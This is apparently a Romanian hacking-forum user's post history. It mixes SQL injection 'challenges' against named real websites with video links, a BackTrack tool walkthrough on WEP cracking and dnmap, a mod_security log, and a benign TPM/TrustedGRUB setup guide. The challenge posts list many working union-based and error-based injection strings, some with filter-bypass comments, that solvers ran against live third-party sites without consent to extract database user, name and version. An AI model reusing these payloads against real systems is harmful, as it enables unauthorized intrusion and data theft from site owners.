Jump to content

Wubi

Active Members
  • Posts

    893
  • Joined

  • Last visited

  • Days Won

    17

Everything posted by Wubi

  1. E ok, felicitari, nu`si avea rostul bypass-ul ala acolo, in rest e bine.
  2. Astept si un PM cu sintaxa. E buna si rezolvarea asta, mi`ar fi placut output-ul ca in proof dar e ok.
  3. Deci... Target: LE POCHE Metoda: Union Based Cerinte: User(),Database() sau Version(). Proof: Site-ul este gasit de Sheyken si mi`a venit apa`n gura pana mi`am dat seama ca nu era chiar atat de greu. [TABLE=class: grid, width: 800] [TR] [TD]Solvers:[/TD] [TD]Syntax:[/TD] [/TR] [TR] [TD]Sheyken[/TD] [TD]- [/TD] [/TR] [TR] [TD]kl0w[/TD] [TD]?rubID=-2%20+/*!50000UnIoN*/%20/*!50000SeLeCt%20aLl*/+%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat%280x5645525349554e4541,0x3a,version%28%29,0x3a,0x4d657273692070656e74727520636f6d70657469746965%20%29,17-- [/TD] [/TR] [TR] [TD]Sweby [/TD] [TD]?rubID=2 and 1=0 UNION SELECT null,null,0x5377656279,0x3a292920416d206761736974206e656e6f726f63697461,null,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),null,null,null,null,null,null,null,null,null,null,null--+ [/TD] [/TR] [TR] [TD]ak4d3a[/TD] [TD]?rubID=2+and+1=2+UnIoN+SeLeCt+1,2,version(),User(),5,Database(),7,8,9,10,11,12,13,14,15,null,17-- [/TD] [/TR] [TR] [TD]neo.hapsis[/TD] [TD]?rubID=2+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(user(),database(),version()),17-- [/TD] [/TR] [TR] [TD]gafi[/TD] [TD]?rubID=2+AND+1=2+UNION+SELECT+concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version())-- [/TD] [/TR] [TR] [TD]badluck[/TD] [TD]?spectaclesID=36 UNION ALL SELECT concat(database(),0x3a,user(),0x3a,version()),2,3,4,5,6-- [/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [/TABLE]
  4. Wubi

    Pagina mea!

    zicem; ma-tii
  5. Daca ai fi urmarit challenge-urile precedente(https://rstcenter.com/forum/59702-easy-sqli-2-a.rst ; https://rstcenter.com/forum/59689-easy-tricky-sqli.rst), ori chiar mai atent tabelul cu solveri din primul post, al 2lea row este dedicat sintaxelor folosite. Cand voi decide sa termin challenge-ul voi adauga si sintaxele. Pana atunci mai incearca, hint: bypass.
  6. [TABLE=class: grid, width: 642] [TR] [TD]Published on Oct 5, 2012 by TheSecurityTube[/TD] [/TR] [TR] [TD]No description available.[/TD] [/TR] [/TABLE] Sursa YouTube
  7. https://www.youtube.com/watch?v=N5M-3MWl-4s&feature=g-u-u [TABLE=class: grid, width: 642] [TR] [TD]Published on Oct 3, 2012 by metasploit619[/TD] [/TR] [TR] [TD]Webacoo.pl download: Download webacoo.pl from Sendspace.com - send big files the easy way Visit my page on facebook: BackTrack Linux fan page | Facebook Surprise: By Cyb3rw0rM TUTORIAL By Cyb3rw0rM CONTACT ME: Cyb3rw0rm@hotmail.com[/TD] [/TR] [/TABLE] Sursa YouTube
  8. Nu... Target: News: Scene sexy per Alanis - Newsic Metoda: Union Based Cerinte: User(),Database() sau Version(). Proof: Site-ul e gasit de Sheyken... [TABLE=class: grid, width: 800] [TR] [TD]Solvers:[/TD] [TD]Syntax:[/TD] [/TR] [TR] [TD]Sheyken[/TD] [TD]+union%0Aselect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- /* and */ ?id=-25890+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1-- [/TD] [/TR] [TR] [TD]fallen_angel[/TD] [TD]?id=-25890+uNion+/*!se%6cect*/+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+- [/TD] [/TR] [TR] [TD]neo.hapsis[/TD] [TD]?id=null%0Dunion%0Dselect+1,2,3,4,5,NULL,0x3c623e6e656f2e686170736973,0x7468616e6b7320666f7220746865206368616c6c656e6765,9,10,11,12,13,14,group_concat(user(),0x3a,database(),0x3a,version()),16,17,18,19,20,21,22,23,24,25,26,NULL,28,29,30-- [/TD] [/TR] [TR] [TD]Sweby[/TD] [TD]?id=25890+and+1=2+UNION%0BSELECT+1,2,3,4,5,user(),group_concat(version(),0x3a,database()),8,9,10,11,12,13,14,concat(0x49206861746520746f20627970617373207468696e6773),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+/* [/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [/TABLE]
  9. Challenge-ul s`a terminat iar sintaxele au fost actualizate. Voi mai face cateva, ceva mai grele. In alta ordine de idei, closed.
  10. Challenge-ul s`a terminat iar sintaxele au fost actualizate. Voi mai face cateva, ceva mai grele. In alta ordine de idei, closed.
  11. Wubi

    Deleted.

    I`m on the right way, I may do it for you with a complete solution until the end of this weekend. /* Sorry for the late or missing responses, I had some problems that took a lot from my time. */
  12. The Green Mile
  13. [FONT=Courier New]==c5ec995b============================== Request: 213.21.217.206 190.196.9.138 - - [15/Feb/2009:15:26:10 +0200] "GET /bug/login_page.php HTTP/1.1" 403 220 "-" "Toata dragostea mea pentru diavola" A2x6cn8AAAIAAEygTEwAAAAs "-" Handler: redirect-handler ---------------------------------------- GET /bug/login_page.php HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate [B]User-Agent: Toata dragostea mea pentru diavola[/B] Host: 213.21.217.206 Connection: Close mod_security-message: Access denied with code 403. <rule is hidden> [severity "EMERGENCY"] mod_security-action: 403 HTTP/1.1 403 Forbidden Content-Length: 220 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5ec995b--[/FONT]
  14. This tool is very usefull for system admins and system auditors for gathering system infor centrally. people who are looking for in-depth details about their personal computers. Are you one of them? SIV is a perfect tool that gives you a lot of detail about your system, and it goes beyond the typical information provided randomly. The information it can show include: Network and hardware info, Information about Windows, CPU, PCI, PCMCIA, USB info SMBus, and much more. SIV is a portable tool comes in a zip file and you don’t need to install it or anything. Simply extract it and run the executable file that fits your system i.e. SIV32X for 32 bit users or SIV64X for 64 bit users. SIV is fast and easy to use Open up the application and you will be bombarded with complete system information. The main page shows system information and you have tabs underneath that show information about the above mentioned components. For troubleshooting and to start with SIV is a handy tool. Supports almost all windwos operating systems even 8 Download SIV: SIV – reg-organizer-setup.exe Sursa PenTestIT
  15. [TABLE=class: grid, width: 642] [TR] [TD] DEFCON 20 Blind XSS Demo by &yet PRO 1 month ago[/TD] [/TR] [TR] [TD]Demonstration that Adam Baldwin did at DEFCON 20 using xss.io to identify blind xss vectors, quickly build reusable exploits and use the referer redirect feature to shorten payload length.[/TD] [/TR] [/TABLE] Sursa Vimeo
  16. Mdeah... Target: Tattoos by Bryan Metoda: Union Based Cerinte: User(),Database(),Version(). Proof: Site-ul este luat tot de la un challenge de pe HF. [TABLE=class: grid, width: 800] [TR] [TD]Solver:[/TD] [TD]Syntax(Dupa inchiderea challenge-ului)[/TD] [/TR] [TR] [TD]ps-axl[/TD] [TD]?id=-45 union all select CONCAT(0x223e, version(), 0x3c212d2d),2-- [/TD] [/TR] [TR] [TD]Sheyken[/TD] [TD]?id=-45 union all select version(),2-- / or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1-- [/TD] [/TR] [TR] [TD]badluck[/TD] [TD]?id=52 and 1=2 union all select concat(User(),0x3a,Database(),0x3a,Version()),2-- [/TD] [/TR] [TR] [TD]DarkyAngel[/TD] [TD]?id=-45 union all select CONCAT(0x223e,user(), 0x207c20, database(), 0x207c20, version(), 0x3c212d2d),2-- [/TD] [/TR] [/TABLE] [TABLE=class: grid, width: 800] [TR] [TD]Solvers 2:[/TD] [TD]Syntax(Dupa inchiderea challenge-ului)[/TD] [/TR] [TR] [TD]c0unt3rlog1c[/TD] [TD]?imagetable=gallery&imageid=1+union+all+select+1,concat(user(),0x3a,database(),0x3a,version())-- [/TD] [/TR] [TR] [TD]Ciresel21[/TD] [TD]?id=1 UNION SELECT Version(),2-- - [/TD] [/TR] [TR] [TD]Toshib4[/TD] [TD]?imagetable=pictures&imageid=-1 union all select 1,version()-- [/TD] [/TR] [TR] [TD]wHoIS[/TD] [TD]-[/TD] [/TR] [/TABLE] [TABLE=class: grid, width: 800] [TR] [TD]Solvers 3:[/TD] [TD]Syntax(Dupa inchiderea challenge-ului)[/TD] [/TR] [TR] [TD] neo.hapsis[/TD] [TD]?id=(52) and (0) union select concat(0x223e,User(),0xba,Database(),0xba,Version( ),0x3c6120687265663d22),2--+- /*and*/ ?id=(52) and (0) union select concat(User(),0xba,Database(),0xba,Version()),2--+- [/TD] [/TR] [TR] [TD]vpatrikv[/TD] [TD]?id=6+union+all+select+concat(0x20,User(),0x20,Database(),0x20,Version()),2-- [/TD] [/TR] [TR] [TD]co4ie[/TD] [TD]?imagetable=gallery&imageid=-45 and 1=1 uNiOn aLl sElEct 1,concat(user(),0x3a,Database(),0x3a,@@Version)-- [/TD] [/TR] [TR] [TD]Sweby[/TD] [TD]- [/TD] [/TR] [/TABLE]
  17. Oh da, m`am plictisit grav. Target: Tense : SchoolNet Thailand Metoda: Union Based Cerinte: User(),Database(),Version(). Proof: Site-ul e luat de la un alt challenge de pe HF. [TABLE=class: grid, width: 800] [TR] [TD]Solver:[/TD] [TD]Syntax(Dupa inchiderea challenge-ului)[/TD] [/TR] [TR] [TD]Sheyken[/TD] [TD]UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135--[/TD] [/TR] [TR] [TD]DarkyAngel[/TD] [TD]UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135--[/TD] [/TR] [TR] [TD]wHoIS[/TD] [TD]-[/TD] [/TR] [TR] [TD]neo.hapsis[/TD] [TD]UNION SELECT 1,2,3,concat(user(),0x7c,database(),0x7c,version() ),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55, 56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72 ,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,8 9,90,91,92,93,94,95,96,97,98,99,100,101,102,103,10 4,105,106,107,108,109,110,111,112,113,114,115,116, 117,118,119,120,121,122,123,124,125,126,127,128,12 9,130,131,132,133,134,135--[/TD] [/TR] [/TABLE] [TABLE=class: grid, width: 800] [TR] [/TR] [/TABLE] [TABLE=class: grid, width: 800] [TR] [TD]Solvers 2:[/TD] [TD]Syntax(Dupa inchiderea challenge-ului)[/TD] [/TR] [TR] [TD]badluck[/TD] [TD]-[/TD] [/TR] [TR] [TD]Co4ie[/TD] [TD]and 1=1 UNION SELECT 1,2,3,group_concat(User(),0x3a,Database(),0x3a,Version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135--[/TD] [/TR] [TR] [TD]Sweby[/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]- [/TD] [/TR] [/TABLE]
  18. [TABLE=class: outer_border, width: 642] [TR] [TD]Published on Sep 29, 2012 by BallastSecurity[/TD] [/TR] [TR] [TD]Description: An example of a single vulnerability in the Archin WordPress theme leading to the complete compromise of a WordPress blog. Narrated, discovered and developed by bwall of Ballast Security. Music by DigiP.[/TD] [/TR] [/TABLE] Sursa YouTube
  19. https://www.youtube.com/watch?v=uuqeCS50g48&feature=g-u-u Sursa YouTube
  20. Backtrack is one of the most popular Linux distributions used for Penetration testing and Security Auditing. The Backtrack development team is sponsored by Offensive Security. On 13th August 2012, Backtrack 5 R3 was released. This included the addition of about 60 new tools, most of which were released during the Defcon and Blackhat conference held in Las Vegas in July 2012. In this series of articles, we will look at most of the new tools that were introduced with Backtrack 5 R3 and look at their usage. Some of the notable changes included tools for mobile penetration testing, GUI tools for Wi-fi cracking and a whole new category of tools called Physical Exploitation. Getting Backtrack 5 R3 There are two ways to get up and running quickly with Backtrack 5 R3. If you are already running Backtrack 5 R2, you can upgrade to Backtrack 5 R3 by following the steps described on this page. Or you can do a fresh install of Backtrack 5 R3 from the downloads section on Backtrack’s official website. A list of the new tools released with Backtrack 5 R3 according to Backtrack’s official website are libcrafter, blueranger, dbd, inundator, intersect, mercury, cutycapt, trixd00r, artemisa, rifiuti2, netgear-telnetenable, jboss-autopwn, deblaze, sakis3g, voiphoney, apache-users, phrasendrescher, kautilya, manglefizz, rainbowcrack, rainbowcrack-mt, lynis-audit, spooftooph, wifihoney, twofi, truecrack, uberharvest, acccheck, statsprocessor, iphoneanalyzer, jad, javasnoop, mitmproxy, ewizard, multimac, netsniff-ng, smbexec, websploit, dnmap, johnny, unix-privesc-check, sslcaudit, dhcpig, intercepter-ng, u3-pwn, binwalk, laudanum, wifite, tnscmd10g bluepot, dotdotpwn, subterfuge, jigsaw, urlcrazy, creddump, android-sdk, apktool, ded, dex2jar, droidbox, smali, termineter, bbqsql, htexploit, smartphone-pentest-framework, fern-wifi-cracker, powersploit, and webhandler. We will be discussing most of these tools in this series. Fern-Wifi-Cracker Fern Wi-fi cracker is a program written in python that provides a GUI for cracking wireless networks. Normally, you need to run aireplay-ng, airodump-ng and aircrack-ng separately in order to crack wireless networks, but Fern-Wifi-cracker makes this job very simple for us by acting as a facade over these tools and hiding all the intricate details from us. It also comes with a bunch of tools that helps you perform attacks like Session Hijacking, locate a particular system’s geolocation based on its Mac address etc. Fern Wi-fi cracker can be found under the category Wireless Exploitation tools as shown in the figure below. Before starting with Fern Wi-fi cracker, it is important to note that you have a Wi-fi card that supports packet injection. In my case, i am running Backtrack 5 R3 as a VM and i have connected an external Alfa Wi-fi card to it. You can verify if your card can be put into monitor mode by just typing airmon-ng and it will show you the list of interfaces that can be put in monitor mode. Once this is done, open up Fern Wi-fi cracker. Select the appropriate interface on which you want to sniff on. Once you have selected it, it will automatically create a virtual interface (mon0) on top of the selected interface (wlan0) as is clear from the image below. Now, click on “Scan for access points”. As you can see from the results, it found 4 networks with WEP and 1 network with WPA. In this case, we will be cracking a WEP network named “Infosec test” which i set up for testing purposes. Click on the network “Infosec test” and it will show you its specific information like the BSSID of the access point, the channel on which the Access point is transmitting on etc. On the bottom right, you can select from a variety of attacks like the Arp request replay attack, caffe latte attack etc. In my case, i will be going for an Arp request replay attack. Once this is done, click on “Wi-fi attack” and this will start the whole process of cracking WEP. You will now see that some IV’s are being captured as shown in the image below. The tool will also tell you if your card is injecting arp packets properly or not as shown in the bottom right section of the image below. Once enough IV’s have been collected, it will start cracking the WEP key automatically. Similarly, Fern Wi-fi cracker can be used to crack WPA. It just makes the whole process so simple for us. It also provides some extra functionality for hijacking sessions and locating a computer’s geolocation via its Mac address. I recommend you check it out. Dnmap Imagine you have to scan a huge network containing thousands of computers. Scanning via nmap from a single computer will take quite a long time. In order to solve this problem, Dnmap was created. Dnmap is a framework which follows a client/server architecture. The server issues nmap commands to the clients and the clients execute it. In this way, the load of performing such a large scan is distributed among the clients. The commands that the server gives to its clients are put in a command file. The results are stored in a log file which are saved on both the server and the client. The whole process of running Dnmap follows these steps. Create a list of commands that you want to run and store it in a file, say commands.txt. Note the IP address of the server. Run the dnmap server and give the commands file as an argument. Connect the clients to the server. Note that the server should be reachable from the client. Let’s do the demo now. I have 2 virtual machines both running Backtrack 5 R3. I am going to run the Dnmap server on one of the virtual machines and a client on the second one. Open dnmap under the category Information Gathering –> Network Analysis –> Identify Live hosts. The next step is to create a commands.txt file. As you can see from the image below, i have 3 commands in the commands.txt file. Now type the command as shown in the image below to start the dnmap server. I have started the dnmap server to listen on port 800. As you can see, it currently detects no clients. Hence the next step is to get some clients to connect to this dnmap server. Also, it is better to specify the location of the log file that will be holding all the results. On my other BT machine, i run the following command to connect the client to the server. Note that the internal IP address of my dnmap server is 10.0.2.15 and since my other virtual machine is also in the same internal network, it is able to reach to the server. You also need to specify the port to which you are connecting to on the server. Also, it is optional to specify an alias for the client. Once the client establishes connection with the server, you will see that the client starts executing the commands that it is getting from the server. On the server side, you will notice that it recognizes this client and shows it in the output. It also keeps giving you regular information like the number of commands executed, uptime, online status etc. Once the scans are completed, dnmap stores the results in a directory named nmap_output. The results are saved in .nmap, .gnmap and xml formats. There are separate output files for each command. It is advisable to clear all the previous files in the nmap_output directory or save them somewhere else before starting a new scan. Here is what a sample response file looks like. In this article, we looked at a couple of the most popular tools that were introduced with Backtrack 5 R3. In further articles in this series, we will be discussing about many other new tools that were shipped with Backtrack 5 R3. If there is a particular tool that you want me to write about or if you have any questions, comments, suggestions regarding this series, please write them down in the comments below. References: Upgrade from Backtrack 5 R2 to R3http://www.backtrack-linux.org/backtrack/upgrade-from-backtrack-5-r2-to-backtrack-5-r3/ Fern-Wifi-Crackerfern-wifi-cracker - Fern wifi cracker for wireless penetration testing - Google Project Hosting Dnmap framework official pagednmap | Free Communications software downloads at SourceForge.net Sursa InfoSec Resources
  21. 1. Initializing the TPM To secure our data we must first initialize the TPM. What we’re actually doing is changing the settings of the hardware TPM chip module on the computer motherboard itself. First we must initialize the TPM physical chip with the tpm_clear command, which returns the TPM to the default state, which is unowned, disabled and inactive. That command wipes all the ownership information from the TPM, invalidates all the keys and data tied to the TPM and even disables and deactivates the TPM. We must remember that the TPM won’t actually be used to encrypt/decrypt our data on the hard drive; it’s just a hardware that contains secret keys that are used by the software component to actually do the encryption and decryption on the fly. The TPM is primarily used to check during boot if the kernel is unmodified, because otherwise an attacker could change our kernel with a malicious one, since the /boot partition is not encrypted when used with LUKS. But the TPM is not checking the integrity of the kernel only, but also the integrity of all BIOS components, bootloader, and other OS components. 1.1. Clearing the TPM [TABLE] [TR] [TD=class: code]</p><p># tpm_clear --force </p><p>Tspi_TPM_ClearOwner failed: 0x00000007 - layer=tpm, code=0007 (7), TPM is disabled </p><p>[/TD] [/TR] [/TABLE] We can see that the TPM is disabled, which is why we can’t clear it. This can happen if we forget to actually enable the TPM in BIOS. The first thing to do would be to actually enable the TPM in BIOS. But if the TPM has been initialized before, we would receive the output that can be seen below: [TABLE] [TR] [TD=class: code]</p><p># tpm_clear --force </p><p>TPM Successfully Cleared. You need to reboot to complete this operation. After reboot the TPM will be in the default state: unowned, disabled and inactive. </p><p>[/TD] [/TR] [/TABLE] This would require us to reboot the computer for changes to take effect. When clearing the TPM we’ll return it to the default state, which is unowned, disabled and inactive, as already mentioned. To enable the TPM afterwards, we need the owner password. But since the TPM owner has been cleared, there is no owner password and we can set a new one without entering the old one. We can also receive an error like the following: [TABLE] [TR] [TD=class: code]</p><p># tpm_clear --force </p><p>Tspi_TPM_ClearOwner failed: 0x0000002d - layer=tpm, code=002d (45), Bad physical presence value </p><p>[/TD] [/TR] [/TABLE] This happens because we can’t clear the TPM from the Linux system, but from BIOS only. This is a security limitation that prevents any user from clearing the TPM. 1.2. Owning the TPM We must also own the TPM to protect our data. Owning the TPM means setting the password that ensures that only the authorized user can access and manage the TPM. This password is also used when we want to turn off the TPM, disable the TPM, clear the TPM, etc, so we must always remember it and don’t forget it. The TPM is shipped in unowned state. We must set two passwords. The first password is an administration password, which is used for administering the TPM, and the second password is a SRK (Storage Root Key) password that is needed whenever we will load a key into the TPM. We can set both passwords with the tpm_takeownership command as can be seen below: [TABLE] [TR] [TD=class: code]</p><p># tpm_takeownership </p><p>Enter owner password: </p><p>Confirm password: </p><p>Enter SRK password: </p><p>Confirm password: </p><p>[/TD] [/TR] [/TABLE] If we later want to change either of the commands, we can do it with the tpm_changeownerauth command. If we pass the –owner argument to the tpm_changeownerauth command we’ll be changing the administration password and if we pass the –srk into the tpm_changeownerauth command we’ll be changing the SRK password. We can see the example of both commands in the output below: [TABLE] [TR] [TD=class: code]</p><p> # tpm_changeownerauth --owner </p><p>Enter owner password: </p><p>Enter new owner password: </p><p>Confirm password: </p><p> </p><p># tpm_changeownerauth --srk </p><p>Enter owner password: </p><p>Enter new SRK password: </p><p>Confirm password: </p><p>[/TD] [/TR] [/TABLE] There are 5 keys in TPM: TPM Endorsement Key (EK): This key is created by the manufacturer and cannot be removed. Sometimes it can be changed by the owner of the computer. TPM Storage Key (SRK): Is the 2048 bit RSA key created when configuring the ownership. This key is stored inside the chip and can be removed. The key is used to encrypt the Storage Key (SK) and Attestation Identity Key (AIK). TPM Storage Key (SK): This key is created during initialization and is used to encrypt other elements in the TPM hierarchy, presumably the Binding Key (BK): Binding Key (BK): This key is used to encrypt little data blocks used by TPM. Attestation Key (AIK): This key is used for the exchanges with TPM, it is used to allow applications to authenticate the TPM. To enable the TPM we must run the tpm_setenable and tpm_setactive commands as below. If we pass the –force option to any of those commands, it will try to use physical presence authorization to execute the command. We must know that most of the TPM operations require owner authorization, but physical access allows us to access certain TPM functions without the owner password. Of course, the physical access doesn’t allow us to reveal TPM ownership password, which would break the confidentiality. [TABLE] [TR] [TD=class: code]</p><p># tpm_setenable --enable </p><p>Enter owner password: </p><p>Disabled status: false </p><p> </p><p># tpm_setactive </p><p>Enter owner password: </p><p>Persistent Deactivated Status: false </p><p>Volatile Deactivated Status: false </p><p>[/TD] [/TR] [/TABLE] There are usually two Endorsement Keys (EK): the public and private one. The private key is always stored at the TPM and cannot even be seen by anyone, while the public key can be displayed with the tpm_getpubek command. [TABLE] [TR] [TD=class: code]</p><p> # tpm_getpubek </p><p>Tspi_TPM_GetPubEndorsementKey failed: 0x00000008 - layer=tpm, code=0008 (8), The TPM target command has been disabled </p><p>Enter owner password: </p><p>Public Endorsement Key: </p><p> Version: 01010000 </p><p> Usage: 0x0002 (Unknown) </p><p> Flags: 0x00000000 (!VOLATILE, !MIGRATABLE, !REDIRECTION) </p><p> AuthUsage: 0x00 (Never) </p><p> Algorithm: 0x00000020 (Unknown) </p><p> Encryption Scheme: 0x00000012 (Unknown) </p><p> Signature Scheme: 0x00000010 (Unknown) </p><p> Public Key: </p><p> a350b3a3 3edddc30 06248f4f 5d3eb80a 34fcbea0 83dde002 8dffa703 e116f8b0 </p><p> eb1962ee a65998b3 384aeb6e 85486be9 0316a6ca a189a5ba 2217b2a2 9da014db </p><p> dfbe7731 fb675e7a 438c4775 deea54fb 0c75de5d ba961950 3eda4555 d27a9a30 </p><p> e94d39d0 a4ea314d a70eaf08 e49dd354 d57ed34d 234220d9 604471a9 86173050 </p><p> 9ff9b0e5 b65cb4b5 5f46a7f9 4378bd7e 8c61b91b ad312974 fef5d70f 84f4484f </p><p> e5c95300 0eef76f2 1667443f dc2fa82e 351d945e 6b5f75e8 828d010f 61541552 </p><p> [...] </p><p>[/TD] [/TR] [/TABLE] 2. TrustedGRUB TrustedGRUB is an extension to a normal GRUB boot loader, which has been modified to support the TPM. We can use TrustedGRUB to connect to the TPM and measure the binary configuration and store the resulting measurements in the Platform Configuration Registers (PCR) in the TPM. These registers can then be used to verify the software configuration running on the TPM-enabled platform. We can list the values in the PCR registers by printing the value of the file /sys/class/misc/tpm0/device/pcrs. An example of such an output can be seen below: [TABLE] [TR] [TD=class: code]</p><p># cat /sys/class/misc/tpm0/device/pcrs </p><p>PCR-00: AD B5 A1 6B F5 42 CA 9D 0F EA 7A 60 94 81 53 F8 E0 42 E6 B6 </p><p>PCR-01: 3A 3F 78 0F 11 A4 B4 99 69 FC AA 80 CD 6E 39 57 C3 3B 22 75 </p><p>PCR-02: 0E AA F8 1E 92 C7 84 F9 9C BB C1 D3 72 12 9D DD DA 30 6E 5A </p><p>PCR-03: 3A 3F 78 0F 11 A4 B4 99 69 FC AA 80 CD 6E 39 57 C3 3B 22 75 </p><p>PCR-04: 47 0E D4 44 DE 46 2C FC 17 5E 3C 68 8D 79 A3 2B 97 30 DF 13 </p><p>PCR-05: 81 96 5F 15 B0 6D 54 56 18 FA E1 51 F1 48 B3 02 D5 08 E9 21 </p><p>PCR-06: 3A 3F 78 0F 11 A4 B4 99 69 FC AA 80 CD 6E 39 57 C3 3B 22 75 </p><p>PCR-07: 3A 3F 78 0F 11 A4 B4 99 69 FC AA 80 CD 6E 39 57 C3 3B 22 75 </p><p>PCR-08: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 </p><p>PCR-09: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 </p><p>PCR-10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 </p><p>PCR-11: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 </p><p>PCR-12: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 </p><p>PCR-13: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 </p><p>PCR-14: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 </p><p>PCR-15: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 </p><p>PCR-16: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 </p><p>PCR-17: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF </p><p>PCR-18: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF </p><p>PCR-19: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF </p><p>PCR-20: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF </p><p>PCR-21: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF </p><p>PCR-22: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF </p><p>PCR-23: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 </p><p>[/TD] [/TR] [/TABLE] First, we must download the TrustedGRUB from the address TrustedGRUB. To download the TrustedGRUB execute the commands below: [TABLE] [TR] [TD=class: code]</p><p># svn co <a href="https://projects.sirrix.com/svn/trustedgrub/release/">https://projects.sirrix.com/svn/trustedgrub/release/</a> </p><p># mv release/ TrustedGRUB/ </p><p># tar xvzf TrustedGRUB-1.1.5.tar.gz </p><p># cd TrustedGRUB-1.1.5/ </p><p>[/TD] [/TR] [/TABLE] What follows is the compilation phase. We can configure and compile the TrustedGRUB with the following command: [TABLE] [TR] [TD=class: code]</p><p> # ./build_tgrub.sh </p><p>- Deflating TrustedGRUB </p><p>- Configuring TrustedGRUB </p><p>- Compiling TrustedGRUB </p><p>- done </p><p> </p><p>Please do </p><p> 'cp default /boot/grub' </p><p> 'cd TrustedGRUB-1.1.5' </p><p> 'make install' 